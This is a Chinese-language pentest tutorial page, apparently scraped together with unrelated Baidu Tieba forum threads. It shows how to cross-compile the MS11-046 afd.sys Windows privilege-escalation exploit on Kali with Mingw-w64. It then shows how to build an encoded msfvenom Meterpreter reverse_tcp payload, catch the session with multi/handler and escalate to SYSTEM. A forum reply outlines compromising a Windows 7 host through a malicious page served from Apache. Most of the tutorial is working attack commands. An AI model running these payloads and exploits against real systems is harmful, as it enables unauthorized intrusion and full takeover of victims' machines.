您还未登录，请登录后再进行相关操作！
在线咨询：
工作时间：周一至周五，9:30-18:30，节假日休息windows 操作系统作为目前使用最广的桌面系统，无论是在企业或是个人来说都占据着巨大的市场份额。因此，作为我们渗透测试人员来说，在日常工作中就会经常碰到 windows 环境下的工作和服务。另一方面，由于大多数渗透测试者主要使用基于 Linux 的发行版，如 Kali Linux，Pentoo 或 Backbox。因此，我们有时不得不在这些 Linux 系统上，来编译完成一些用于
windows 的 EXP。其实这并不难实现，只需一款名为 Mingw-w64 的软件就能帮我们完成任务！
Mingw-w64 是一个免费及开放源码的，用于 windows 应用程序的开发环境。最初它并不叫 Mingw-w64 而是叫 Mingw32，因为它不支持 64 位的操作系统。在本教程中，我将教大家如何在 kali linux 上编译用于 windows 下的 EXP。下面，让我们在 kali 上开始安装&Mingw-w64 。
Kali Linux 安装 Mingw-w64
Mingw-w64 在 kali 2.0 上并未集成，因此我们需要手动来完成安装。命令如下：
apt-get update
apt-get install mingw-w64
我们输入 Y 确认安装，下载和安装可能需要等一小会儿。
mingw-w64 安装包找不到？
在安装过程中，你可能会有这种情况，提示你无法找到 mingw-w64 安装包。就像下面：
root@kali:~# apt-get install mingw-w64
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package mingw-w64
要解决这个问题，必须确保你在&sources.list&文件中具有可用的存储库。我们使用 nano 来编辑打开该文件：
/etc/apt/sources.list
检查你的存储库是否正确可用，你可以在以下页面找到不同版本 Kali Linux 的存储库：
当你正确配置了&sources.list&中的存储库，你需要使用&apt-get update&来更新你的源，之后再次进行&mingw-w64&的安装即可！
Mingw-w64 编译 Windows EXP
到这里我们已经成功安装了 Mingw-w64 在 kali 上。在这里我将以&CVE-（MS11-046）为例，这是一个用 c 语言编写的 Windows EXP 它是 Windows 7 SP0 x86&上的一个漏洞利用程序。此版本的 Windows 系统，在 辅助功能驱动程序（AFD）中包含一个漏洞，并允许为已认证的非管理用户进行特权提升。虽然我们使用的&Mingw-w64
是为 64 位的系统定制的，但是它依然可以用于编译 32 位的 windows EXP。下面让我们看看如何编译一个 32 位的 windows EXP。
首先，让我们从 Exploit-db 上下载我们需要编译的 EXP：
wget ‐‐output-document= 40564.c https://www./download/40564
使用以下命令编译 Windows 32 位的 afd.sys exp：
i686-w64-mingw32-gcc [input file: source]–o [output file: .exe]–lws2_32
下面的命令编译的是 Windows 7&afd.sys 提权 exp：
i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32
编译完成后，我们将编译后的 exe 文件拷贝到 Apache web 服务根目录下，并启动了 Apache 服务。
我们将下载到 windows 上的 exe 程序使用 cmd.exe 打开，可以看到如下信息：
可以看到我们编译后的 EXP 在 windows 7上被成功执行，并将我们的权限从原来的&test&提升为了&system&权限！这个 exploit 实际上在当前 shell 中生成了一个新的 shell，而不是在新窗口中创建一个新的
shell 。这意味着，我们也可以从命令行 shell 运行此利用程序。例如 Meterpreter 中。
Exploit 编译错误
当编译不同架构和操作系统的 EXP 时，可能会发生许多错误。有很多变量可能会导致编译失败，例如：语法，库，主机和目标系统架构，已安装的编译软件等，都会带来影响。有些错误我们可以很轻松的处理，但对于有些问题处理起来却并不轻松。从轻度的警告到致命的错误&errors&，警告或许只是提示你一些功能函数的过时，但并不会导致程序无法运行。而关键错误提示则往往是致命的，它会导致你程序的直接终止运行。
处理编译错误的最佳方法是仔细阅读，然后在Google上搜索解决方案。通常来说你不会是唯一一个遇到这类错误的人，因此大可不必闭门重造轮子。在线资源，通常就能很好的解决你的问题。
Meterpreter shell 下 MS11-046 利用
让我们快速的使用 Msfvenom 来生成一个 Meterpreter 的 TCP 反弹 shell ，并在我们的目标主机上执行该 shell 。同时我们将使用 Metasploit 下的 multi handler 来处理反弹会话。使用以下命令生成 payload：
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe
以上的 IP 和 PORT 根据你们自身情况填写。现在我们启动 msfconsole 并配置 multi handler exploit：
use exploit/multi/handler
set lhost [listening host IP]
set lport 4444
如果以上步骤正确无误，那么我们将会获取到目标主机的一个 Meterpreter shell ：
下面我们就可以使用 shell 来进入命令行的 console 界面，并运行我们之前的提权 EXP 来实现权限的提升操作：
可以看到，我们成功将普通权限提升为了系统权限。这里由于在执行它的 shell 中生成了一个新的系统 shell ，因此我们权限受到了一定限制，导致我们无法在原来的 shell 中看到 EXP 的输出信息。如果你想看到 EXP 的信息，我们只需 exit 退出到普通 shell 中，我们依然可以看到 EXP 的输出信息：
在这篇文章中，我们学会了如何在 Linux 下编译和使用 windows EXP ，以及在 Meterpreter shell 中的使用方法。其实这不是最重要的，重要的是当我们在渗透过程中，遇到一些问题，我们要学会尝试着去解决它。这对我们的学习和成长将会带来不小的进步！
本文由 即刻安全 编译及整理。转载需注明来源！
原文链接：
本文已收录于以下专栏：
相关文章推荐
本文标签：  
Windows漏洞
Mingw-w64是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w64最初叫Mingw32，...
Kali Linux 6 系统下更换GRUB背景图片（Vmware Workstation 12.5 & Windows 10 X64 环境）
我是在网上发现老外的文章，名字是“...
Oracle exp query条件检索在WINDOWS和LINUX下的命令区别
09:54:15     我来说两句      
收藏   &#...
相信很多信息安全爱好者都对Kali Linux爱不释手！作为一个出色的渗透测试的平台，Kali近乎完美，但除此之外，Windows系统却更加适合普通用户的需求，怎样才能将这两者合二为一，随意切换呢？双...
相信很多朋友使用的电脑都是单系统的，因为单系统在安装和使用方面都是比较方便，还有就是硬盘的空间比较小且没有什么很大的使用性质，因为同是Windows 系统，单系统和双系统有什么区别呢？但是，因为有了双...
一，Windows+Kali Linux双系统安装使用虚拟机，毕竟是虚拟的，还是双系统更加彻底，起码会跑的快的多。本篇介绍在已有windows系统的基础上，安装第二个操作系统Kali Linux的方法...
他的最新文章
讲师：王哲涵
讲师：王渊命
您举报文章：
举报原因：
原文地址：
原因补充：
(最多只允许输入30个字)【kali linux】windows 下非常好用远控工具。。_kali吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：13,662贴子：
【kali linux】windows 下非常好用远控工具。。收藏
视频来自：
音基考试，就去我爱音乐考试网
是德国那个远控工具吗？-------------------Kali Linux安全渗透教程新手版
这是什么年代的教程，还用xp
标题党，浪费流量
登录百度帐号推荐应用现在位置：
相关文章随机文章
本站推荐 阅读 7,363 次 阅读 1,155 次 阅读 5,975 次 阅读 3,435 次 阅读 1,107 次 阅读 8,264 次 阅读 7,281 次 阅读 1,298 次 阅读 2,632 次 阅读 3,289 次 阅读 2,966 次 阅读 6,350 次 阅读 1,647 次 阅读 2,087 次 阅读 1,523 次 阅读 2,134 次热门文章1234567891011121314151617181920kali如何入侵win7，前提是win7不执行木马程序_kali吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：13,662贴子：
kali如何入侵win7，前提是win7不执行木马程序收藏
如题。是否可以利用远程端口溢出来入侵win7，求大神？
点击更新楼盘，事实报价，全行业低价查看
是win7裸机还是配置好安全措施的机器？！
用工具扫下漏洞呗
社会工程学
嘿，让我来回答吧，用msf做出一个木马网页源码，拷贝到apache文件夹里，打开apache2，msf开启监视木马，用内网的win7电脑在网站输入你的IP地址并打开，再检查msf有了一个新用户就是win7了，我一年没接触这些了，今晚无聊就回答上面的可能解释不清楚，你可以问问别人
登录百度帐号推荐应用